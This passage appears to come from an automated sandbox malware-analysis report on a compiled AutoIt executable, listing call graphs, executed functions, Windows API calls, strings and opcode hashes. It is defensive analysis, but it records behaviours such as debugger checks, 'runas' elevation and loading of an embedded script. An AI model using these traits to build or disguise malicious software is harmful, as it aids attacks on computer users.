calls 106304->106308 106307 a17667 59 API calls 106305->106307 106309 a7d0d2 106307->106309 106310 a7d1ec 106308->106310 106311 a19837 84 API calls 106309->106311 106312 a157f6 67 API calls 106310->106312 106313 a7d0de 106311->106313 106314 a7d1fb 106312->106314 106315 a1459b 59 API calls 106313->106315 106316 a7d233 106314->106316 106317 a7d1ff GetLastError 106314->106317 106318 a7d0f3 106315->106318 106321 a7d295 106316->106321 106322 a7d25e 106316->106322 106319 a7d218 106317->106319 106320 a17b2e 59 API calls 106318->106320 106340 a7d188 Mailbox 106319->106340 106502 a158ba CloseHandle 106319->106502 106323 a7d126 106320->106323 106324 a30db6 Mailbox 59 API calls 106321->106324 106325 a30db6 Mailbox 59 API calls 106322->106325 106326 a7d178 106323->106326 106327 a73c37 3 API calls 106323->106327 106328 a7d29a 106324->106328 106329 a7d263 106325->106329 106500 a19b3c 59 API calls 106326->106500 106332 a7d136 106327->106332 106335 a17667 59 API calls 106328->106335 106328->106340 106333 a7d274 106329->106333 106336 a17667 59 API calls 106329->106336 106332->106326 106334 a7d13a 106332->106334 106503 a8fbce 59 API calls 2 library calls 106333->106503 106337 a17de1 59 API calls 106334->106337 106335->106340 106336->106333 106339 a7d147 106337->106339 106499 a73a2a 63 API calls Mailbox 106339->106499 106340->106279 106342->106301 106342->106340 106343 a7d150 Mailbox 106343->106326 106345 a19837 84 API calls 106344->106345 106346 a84494 106345->106346 106347 a16240 94 API calls 106346->106347 106348 a844a4 106347->106348 106349 a844c9 106348->106349 106350 a19ea0 341 API calls 106348->106350 106352 a844cd 106349->106352 106504 a19a98 106349->106504 106350->106349 106352->106279 106354 a19a98 59 API calls 106353->106354 106355 a21fdb 106354->106355 106356 a30db6 Mailbox 59 API calls 106355->106356 106360 a56585 106355->106360 106358 a21ff4 106356->106358 106359 a22004 106358->106359 106532 a157a6 60 API calls Mailbox 106358->106532 106363 a19837 84 API calls 106359->106363 106361 a22029 106360->106361 106536 a7f574 59 API calls 106360->106536 106369 a22036 106361->106369 106537 a19b3c 59 API calls 106361->106537 106365 a22012 106363->106365 106367 a157f6 67 API calls 106365->106367 106366 a565cd 106368 a565d5 106366->106368 106366->106369 106370 a22021 106367->106370 106538 a19b3c 59 API calls 106368->106538 106372 a15cdf 2 API calls 106369->106372 106370->106360 106370->106361 106535 a158ba CloseHandle 106370->106535 106374 a2203d 106372->106374 106375 a565e7 106374->106375 106376 a22057 106374->106376 106378 a30db6 Mailbox 59 API calls 106375->106378 106377 a17667 59 API calls 106376->106377 106379 a2205f 106377->106379 106380 a565ed 106378->106380 106517 a15572 106379->106517 106382 a56601 106380->106382 106539 a15850 ReadFile SetFilePointerEx 106380->106539 106387 a56605 _memmove 106382->106387 106540 a776c4 59 API calls 2 library calls 106382->106540 106384 a2206e 106384->106387 106533 a19a3c 59 API calls Mailbox 106384->106533 106388 a22082 Mailbox 106389 a220bc 106388->106389 106390 a15c6f CloseHandle 106388->106390 106389->106279 106391 a220b0 106390->106391 106391->106389 106534 a158ba CloseHandle 106391->106534 106394 a7d0a5 106393->106394 106395 a7d09a 106393->106395 106397 a7d17f Mailbox 106394->106397 106400 a17667 59 API calls 106394->106400 106564 a19b3c 59 API calls 106395->106564 106398 a30db6 Mailbox 59 API calls 106397->106398 106436 a7d188 Mailbox 106397->106436 106399 a7d1c8 106398->106399 106401 a7d1d4 106399->106401 106567 a157a6 60 API calls Mailbox 106399->106567 106402 a7d0c9 106400->106402 106405 a19837 84 API calls 106401->106405 106404 a17667 59 API calls 106402->106404 106406 a7d0d2 106404->106406 106407 a7d1ec 106405->106407 106408 a19837 84 API calls 106406->106408 106409 a157f6 67 API calls 106407->106409 106410 a7d0de 106408->106410 106411 a7d1fb 106409->106411 106412 a1459b 59 API calls 106410->106412 106413 a7d233 106411->106413 106414 a7d1ff GetLastError 106411->106414 106415 a7d0f3 106412->106415 106418 a7d295 106413->106418 106419 a7d25e 106413->106419 106416 a7d218 106414->106416 106417 a17b2e 59 API calls 106415->106417 106416->106436 106568 a158ba CloseHandle 106416->106568 106420 a7d126 106417->106420 106421 a30db6 Mailbox 59 API calls 106418->106421 106422 a30db6 Mailbox 59 API calls 106419->106422 106423 a7d178 106420->106423 106424 a73c37 3 API calls 106420->106424 106425 a7d29a 106421->106425 106426 a7d263 106422->106426 106566 a19b3c 59 API calls 106423->106566 106429 a7d136 106424->106429 106432 a17667 59 API calls 106425->106432 106425->106436 106430 a7d274 106426->106430 106433 a17667 59 API calls 106426->106433 106429->106423 106431 a7d13a 106429->106431 106569 a8fbce 59 API calls 2 library calls 106430->106569 106434 a17de1 59 API calls 106431->106434 106432->106436 106433->106430 106437 a7d147 106434->106437 106436->106279 106565 a73a2a 63 API calls Mailbox 106437->106565 106439 a7d150 Mailbox 106439->106423 106441 a8cadd 130 API calls 106440->106441 106442 a8df33 106441->106442 106442->106279 106444 a17667 59 API calls 106443->106444 106445 a8c2f4 106444->106445 106446 a17667 59 API calls 106445->106446 106447 a8c2fc 106446->106447 106448 a17667 59 API calls 106447->106448 106449 a8c304 106448->106449 106450 a19837 84 API calls 106449->106450 106463 a8c312 106450->106463 106451 a17bcc 59 API calls 106451->106463 106452 a8c4fb 106453 a8c528 Mailbox 106452->106453 106572 a19a3c 59 API calls Mailbox 106452->106572 106453->106279 106455 a8c4e2 106457 a17cab 59 API calls 106455->106457 106456 a8c4fd 106461 a17cab 59 API calls 106456->106461 106459 a8c4ef 106457->106459 106458 a18047 59 API calls 106458->106463 106465 a17b2e 59 API calls 106459->106465 106460 a17924 59 API calls 106460->106463 106462 a8c50c 106461->106462 106466 a17b2e 59 API calls 106462->106466 106463->106451 106463->106452 106463->106453 106463->106455 106463->106456 106463->106458 106463->106460 106464 a17e4f 59 API calls 106463->106464 106467 a17e4f 59 API calls 106463->106467 106472 a17cab 59 API calls 106463->106472 106473 a19837 84 API calls 106463->106473 106474 a17b2e 59 API calls 106463->106474 106468 a8c3a9 CharUpperBuffW 106464->106468 106465->106452 106466->106452 106469 a8c469 CharUpperBuffW 106467->106469 106570 a1843a 68 API calls 106468->106570 106571 a1c5a7 69 API calls 2 library calls 106469->106571 106472->106463 106473->106463 106474->106463 106476 a77962 106475->106476 106477 a30db6 Mailbox 59 API calls 106476->106477 106478 a77970 106477->106478 106479 a7797e 106478->106479 106480 a17667 59 API calls 106478->106480 106479->106279 106480->106479 106573 a660c0 106481->106573 106483 a6618c 106483->106279 106484->106273 106485->106273 106486->106279 106487->106289 106488->106278 106489->106251 106490->106279 106491->106259 106492->106286 106493->106286 106494->106286 106495->106267 106496->106274 106497->106267 106498->106298 106499->106343 106500->106342 106501->106304 106502->106340 106503->106340 106505 a4f7d6 106504->106505 106506 a19aa8 106504->106506 106507 a4f7e7 106505->106507 106508 a17bcc 59 API calls 106505->106508 106511 a30db6 Mailbox 59 API calls 106506->106511 106509 a17d8c 59 API calls 106507->106509 106508->106507 106510 a4f7f1 106509->106510 106514 a19ad4 106510->106514 106515 a17667 59 API calls 106510->106515 106512 a19abb 106511->106512 106512->106510 106513 a19ac6 106512->106513 106513->106514 106516 a17de1 59 API calls 106513->106516 106514->106352 106515->106514 106516->106514 106518 a155a2 106517->106518 106519 a1557d 106517->106519 106520 a17d8c 59 API calls 106518->106520 106519->106518 106521 a1558c 106519->106521 106528 a7325e 106520->106528 106543 a15ab8 106521->106543 106523 a7328d 106523->106384 106528->106523 106541 a731fa ReadFile SetFilePointerEx 106528->106541 106542 a17924 59 API calls 2 library calls 106528->106542 106531 a7339c Mailbox 106531->106384 106532->106359 106533->106388 106534->106389 106535->106360 106536->106360 106537->106366 106538->106374 106539->106382 106540->106387 106541->106528 106542->106528 106544 a30db6 Mailbox 59 API calls 106543->106544 106545 a15acb 106544->106545 106546 a30db6 Mailbox 59 API calls 106545->106546 106547 a15ad7 106546->106547 106548 a154d2 106547->106548 106555 a158cf 106548->106555 106550 a15514 106550->106531 106554 a177da 61 API calls Mailbox 106550->106554 106551 a15bc0 2 API calls 106552 a154e3 106551->106552 106552->106550 106552->106551 106562 a15a7a 59 API calls 2 library calls 106552->106562 106554->106531 106556 a158e0 106555->106556 106557 a4dc3c 106555->106557 106556->106552 106563 a65ecd 59 API calls Mailbox 106557->106563 106559 a4dc46 106560 a30db6 Mailbox 59 API calls 106559->106560 106561 a4dc52 106560->106561 106562->106552 106563->106559 106564->106394 106565->106439 106566->106397 106567->106401 106568->106436 106569->106436 106570->106463 106571->106463 106572->106453 106574 a660cb 106573->106574 106575 a660e8 106573->106575 106574->106575 106577 a660ab 59 API calls Mailbox 106574->106577 106575->106483 106577->106574 106578 1da23b0 106593 1da0000 106578->106593 106580 1da2462 106596 1da22a0 106580->106596 106599 1da3490 GetPEB 106593->106599 106595 1da068b 106595->106580 106597 1da22a9 Sleep 106596->106597 106598 1da22b7 106597->106598 106600 1da34ba 106599->106600 106600->106595 106601 a1e5ab 106604 a1d100 106601->106604 106603 a1e5b9 106605 a1d11d 106604->106605 106621 a1d37d 106604->106621 106606 a52691 106605->106606 106607 a526e0 106605->106607 106629 a1d144 106605->106629 106610 a52694 106606->106610 106615 a526af 106606->106615 106648 a8a3e6 341 API calls __cinit 106607->106648 106611 a526a0 106610->106611 106610->106629 106646 a8a9fa 341 API calls 106611->106646 106612 a32d40 __cinit 67 API calls 106612->106629 106615->106621 106647 a8aea2 341 API calls 3 library calls 106615->106647 106616 a1d434 106640 a18a52 68 API calls 106616->106640 106617 a528b5 106617->106617 106618 a1d54b 106618->106603 106621->106618 106653 a79e4a 89 API calls 4 library calls 106621->106653 106623 a1d443 106623->106603 106624 a527fc 106652 a8a751 89 API calls 106624->106652 106628 a184c0 69 API calls 106628->106629 106629->106612 106629->106616 106629->106618 106629->106621 106629->106624 106629->106628 106635 a19ea0 341 API calls 106629->106635 106636 a18047 59 API calls 106629->106636 106638 a18740 68 API calls __cinit 106629->106638 106639 a18542 68 API calls 106629->106639 106641 a1843a 68 API calls 106629->106641 106642 a1cf7c 341 API calls 106629->106642 106643 a19dda 59 API calls Mailbox 106629->106643 106644 a1cf00 89 API calls 106629->106644 106645 a1cd7d 341 API calls 106629->106645 106649 a18a52 68 API calls 106629->106649 106650 a19d3c 60 API calls Mailbox 106629->106650 106651 a6678d 60 API calls 106629->106651 106635->106629 106636->106629 106638->106629 106639->106629 106640->106623 106641->106629 106642->106629 106643->106629 106644->106629 106645->106629 106646->106618 106647->106621 106648->106629 106649->106629 106650->106629 106651->106629 106652->106621 106653->106617 106654 a1552a 106655 a15ab8 59 API calls 106654->106655 106656 a1553c 106655->106656 106657 a154d2 61 API calls 106656->106657 106658 a1554a 106657->106658 106660 a1555a Mailbox 106658->106660 106661 a18061 MultiByteToWideChar 106658->106661 106662 a18087 106661->106662 106663 a180ce 106661->106663 106665 a30db6 Mailbox 59 API calls 106662->106665 106664 a17d8c 59 API calls 106663->106664 106668 a180c0 106664->106668 106666 a1809c MultiByteToWideChar 106665->106666 106669 a1774d 106666->106669 106668->106660 106670 a1775c 106669->106670 106671 a177cf 106669->106671 106670->106671 106673 a17768 106670->106673 106672 a17d2c 59 API calls 106671->106672 106678 a1777a _memmove 106672->106678 106674 a177a0 106673->106674 106675 a17772 106673->106675 106677 a18029 59 API calls 106674->106677 106681 a17f27 59 API calls Mailbox 106675->106681 106679 a177aa 106677->106679 106678->106668 106680 a30db6 Mailbox 59 API calls 106679->106680 106680->106678 106681->106678 106682 a1107d 106687 a1708b 106682->106687 106684 a1108c 106685 a32d40 __cinit 67 API calls 106684->106685 106686 a11096 106685->106686 106688 a1709b __write_nolock 106687->106688 106689 a17667 59 API calls 106688->106689 106690 a17151 106689->106690 106691 a14706 61 API calls 106690->106691 106692 a1715a 106691->106692 106718 a3050b 106692->106718 106695 a17cab 59 API calls 106696 a17173 106695->106696 106697 a13f74 59 API calls 106696->106697 106698 a17182 106697->106698 106699 a17667 59 API calls 106698->106699 106700 a1718b 106699->106700 106701 a17d8c 59 API calls 106700->106701 106702 a17194 RegOpenKeyExW 106701->106702 106703 a4e8b1 RegQueryValueExW 106702->106703 106708 a171b6 Mailbox 106702->106708 106704 a4e943 RegCloseKey 106703->106704 106705 a4e8ce 106703->106705 106704->106708 106717 a4e955 _wcscat Mailbox __wsetenvp 106704->106717 106706 a30db6 Mailbox 59 API calls 106705->106706 106707 a4e8e7 106706->106707 106710 a1522e 59 API calls 106707->106710 106708->106684 106709 a179f2 59 API calls 106709->106717 106711 a4e8f2 RegQueryValueExW 106710->106711 106712 a4e90f 106711->106712 106714 a4e929 106711->106714 106713 a17bcc 59 API calls 106712->106713 106713->106714 106714->106704 106715 a17de1 59 API calls 106715->106717 106716 a13f74 59 API calls 106716->106717 106717->106708 106717->106709 106717->106715 106717->106716 106719 a41940 __write_nolock 106718->106719 106720 a30518 GetFullPathNameW 106719->106720 106721 a3053a 106720->106721 106722 a17bcc 59 API calls 106721->106722 106723 a17165 106722->106723 106723->106695

                                                                                              Executed Functions

                                                                                              Function 00A13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A13B68
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00A13B7A
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD52F8,00AD52E0,?,?), ref: 00A13BEB
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                                • Part of subcall function 00A2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13C14,00AD52F8,?,?,?), ref: 00A2096E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A13C6F
                                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00AC7770,00000010), ref: 00A4D281
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00AD52F8,?,?,?), ref: 00A4D2B9
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AC4260,00AD52F8,?,?,?), ref: 00A4D33F
                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A4D346
                                                                                                • Part of subcall function 00A13A46: GetSysColorBrush.USER32(0000000F), ref: 00A13A50
                                                                                                • Part of subcall function 00A13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00A13A5F
                                                                                                • Part of subcall function 00A13A46: LoadIconW.USER32(00000063), ref: 00A13A76
                                                                                                • Part of subcall function 00A13A46: LoadIconW.USER32(000000A4), ref: 00A13A88
                                                                                                • Part of subcall function 00A13A46: LoadIconW.USER32(000000A2), ref: 00A13A9A
                                                                                                • Part of subcall function 00A13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A13AC0
                                                                                                • Part of subcall function 00A13A46: RegisterClassExW.USER32(?), ref: 00A13B16
                                                                                                • Part of subcall function 00A139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A13A03
                                                                                                • Part of subcall function 00A139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13A24
                                                                                                • Part of subcall function 00A139D5: ShowWindow.USER32(00000000,?,?), ref: 00A13A38
                                                                                                • Part of subcall function 00A139D5: ShowWindow.USER32(00000000,?,?), ref: 00A13A41
                                                                                                • Part of subcall function 00A1434A: _memset.LIBCMT ref: 00A14370
                                                                                                • Part of subcall function 00A1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A14415
                                                                                              Strings
                                                                                              • This is a third-party compiled AutoIt script., xrefs: 00A4D279
                                                                                              • runas, xrefs: 00A4D33A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                              • API String ID: 529118366-3287110873
                                                                                              • Opcode ID: 0c3efd86e98283803901dc97e8fbaf62ea9e51ef9b8ca55c584ab92a86c4237d
                                                                                              • Instruction ID: 51a551b4a92152292382f5817afda284d83b5ee0b56520b428fc196b3d0d86a4
                                                                                              • Opcode Fuzzy Hash: 0c3efd86e98283803901dc97e8fbaf62ea9e51ef9b8ca55c584ab92a86c4237d
                                                                                              • Instruction Fuzzy Hash: 1E51D475E09248BECF01EFF5DD05EED7B78AF45710B004066F452A62A2DAB0568ACB61
                                                                                              Function 00A149A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 996 a149a0-a14a00 call a17667 GetVersionExW call a17bcc 1001 a14a06 996->1001 1002 a14b0b-a14b0d 996->1002 1004 a14a09-a14a0e 1001->1004 1003 a4d767-a4d773 1002->1003 1005 a4d774-a4d778 1003->1005 1006 a14b12-a14b13 1004->1006 1007 a14a14 1004->1007 1009 a4d77a 1005->1009 1010 a4d77b-a4d787 1005->1010 1008 a14a15-a14a4c call a17d2c call a17726 1006->1008 1007->1008 1018 a4d864-a4d867 1008->1018 1019 a14a52-a14a53 1008->1019 1009->1010 1010->1005 1012 a4d789-a4d78e 1010->1012 1012->1004 1014 a4d794-a4d79b 1012->1014 1014->1003 1016 a4d79d 1014->1016 1020 a4d7a2-a4d7a5 1016->1020 1021 a4d880-a4d884 1018->1021 1022 a4d869 1018->1022 1019->1020 1023 a14a59-a14a64 1019->1023 1024 a14a93-a14aaa GetCurrentProcess IsWow64Process 1020->1024 1025 a4d7ab-a4d7c9 1020->1025 1026 a4d886-a4d88f 1021->1026 1027 a4d86f-a4d878 1021->1027 1030 a4d86c 1022->1030 1031 a14a6a-a14a6c 1023->1031 1032 a4d7ea-a4d7f0 1023->1032 1028 a14aac 1024->1028 1029 a14aaf-a14ac0 1024->1029 1025->1024 1033 a4d7cf-a4d7d5 1025->1033 1026->1030 1036 a4d891-a4d894 1026->1036 1027->1021 1028->1029 1037 a14ac2-a14ad2 call a14b37 1029->1037 1038 a14b2b-a14b35 GetSystemInfo 1029->1038 1030->1027 1039 a4d805-a4d811 1031->1039 1040 a14a72-a14a75 1031->1040 1034 a4d7f2-a4d7f5 1032->1034 1035 a4d7fa-a4d800 1032->1035 1041 a4d7d7-a4d7da 1033->1041 1042 a4d7df-a4d7e5 1033->1042 1034->1024 1035->1024 1036->1027 1053 a14ad4-a14ae1 call a14b37 1037->1053 1054 a14b1f-a14b29 GetSystemInfo 1037->1054 1045 a14af8-a14b08 1038->1045 1046 a4d813-a4d816 1039->1046 1047 a4d81b-a4d821 1039->1047 1043 a4d831-a4d834 1040->1043 1044 a14a7b-a14a8a 1040->1044 1041->1024 1042->1024 1043->1024 1052 a4d83a-a4d84f 1043->1052 1049 a14a90 1044->1049 1050 a4d826-a4d82c 1044->1050 1046->1024 1047->1024 1049->1024 1050->1024 1055 a4d851-a4d854 1052->1055 1056 a4d859-a4d85f 1052->1056 1061 a14ae3-a14ae7 GetNativeSystemInfo 1053->1061 1062 a14b18-a14b1d 1053->1062 1057 a14ae9-a14aed 1054->1057 1055->1024 1056->1024 1057->1045 1060 a14aef-a14af2 FreeLibrary 1057->1060 1060->1045 1061->1057 1062->1061
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00A149CD
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • GetCurrentProcess.KERNEL32(?,00A9FAEC,00000000,00000000,?), ref: 00A14A9A
                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00A14AA1
                                                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00A14AE7
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A14AF2
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00A14B23
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00A14B2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1986165174-0
                                                                                              • Opcode ID: 4d62f58253c465ac2219929506ccb920288777e7826baf621be1c8169a458a4d
                                                                                              • Instruction ID: 3f6f7d9cf56a0e1699faa37c8ce2e4606b5c8fb6e352e867695022349884a2f6
                                                                                              • Opcode Fuzzy Hash: 4d62f58253c465ac2219929506ccb920288777e7826baf621be1c8169a458a4d
                                                                                              • Instruction Fuzzy Hash: BF91C43598D7C0DEC731CB7895501EAFFF5AF6E300B584AAED0C793A41D620A588C769
                                                                                              Function 00A14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1063 a14e89-a14ea1 CreateStreamOnHGlobal 1064 a14ec1-a14ec6 1063->1064 1065 a14ea3-a14eba FindResourceExW 1063->1065 1066 a14ec0 1065->1066 1067 a4d933-a4d942 LoadResource 1065->1067 1066->1064 1067->1066 1068 a4d948-a4d956 SizeofResource 1067->1068 1068->1066 1069 a4d95c-a4d967 LockResource 1068->1069 1069->1066 1070 a4d96d-a4d975 1069->1070 1071 a4d979-a4d98b 1070->1071 1071->1066
                                                                                              APIs
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A14D8E,?,?,00000000,00000000), ref: 00A14E99
                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A14D8E,?,?,00000000,00000000), ref: 00A14EB0
                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F), ref: 00A4D937
                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F), ref: 00A4D94C
                                                                                              • LockResource.KERNEL32(00A14D8E,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F,00000000), ref: 00A4D95F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                              • String ID: SCRIPT
                                                                                              • API String ID: 3051347437-3967369404
                                                                                              • Opcode ID: b715b803d2d400e4ded562d4db2bdee9fc0ae1561ec464c7e90895be14be4d40
                                                                                              • Instruction ID: 9333d1ceeb48f898c2fd3e3068b38d0f42db688f7e805e7cdf4821663e627900
                                                                                              • Opcode Fuzzy Hash: b715b803d2d400e4ded562d4db2bdee9fc0ae1561ec464c7e90895be14be4d40
                                                                                              • Instruction Fuzzy Hash: DB115EB5244700BFD7218BA9EC48FA77BBAFBC9B51F204269F405C6290DF71E8418660
                                                                                              Function 00A7445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00A4E398), ref: 00A7446A
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00A7447B
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7448B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                              • String ID:
                                                                                              • API String ID: 48322524-0
                                                                                              • Opcode ID: cbd2ce922369e373c2a519c4625a713e882a48a9eed84b14a434c482b5c9af78
                                                                                              • Instruction ID: 35026a8a778d16235821ef793b999c29f421688dd8f7a1101b7e9d6326ec3221
                                                                                              • Opcode Fuzzy Hash: cbd2ce922369e373c2a519c4625a713e882a48a9eed84b14a434c482b5c9af78
                                                                                              • Instruction Fuzzy Hash: 93E0D8335105006B4210AB78EC0D5EA775C9E09335F24C716F839C10D0FB745900A595
                                                                                              Function 00A1E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • Variable must be of type 'Object'., xrefs: 00A53E62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Variable must be of type 'Object'.
                                                                                              • API String ID: 0-109567571
                                                                                              • Opcode ID: e841162f23608dffb8712ccbe9c34e236fa415d363f40cac3ed6b7c6fe7b0d8f
                                                                                              • Instruction ID: a482492509630f4f2d504ffa3060a7f763638de5f9e0a05a17511e00e037f299
                                                                                              • Opcode Fuzzy Hash: e841162f23608dffb8712ccbe9c34e236fa415d363f40cac3ed6b7c6fe7b0d8f
                                                                                              • Instruction Fuzzy Hash: A7A28C75A00215DFCB24CF98C580AEAB7B2FF58314F288469ED06AB351D735ED86CB90
                                                                                              Function 00A209D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A20A5B
                                                                                              • timeGetTime.WINMM ref: 00A20D16
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A20E53
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A20E61
                                                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00A20EFA
                                                                                              • DestroyWindow.USER32 ref: 00A20F06
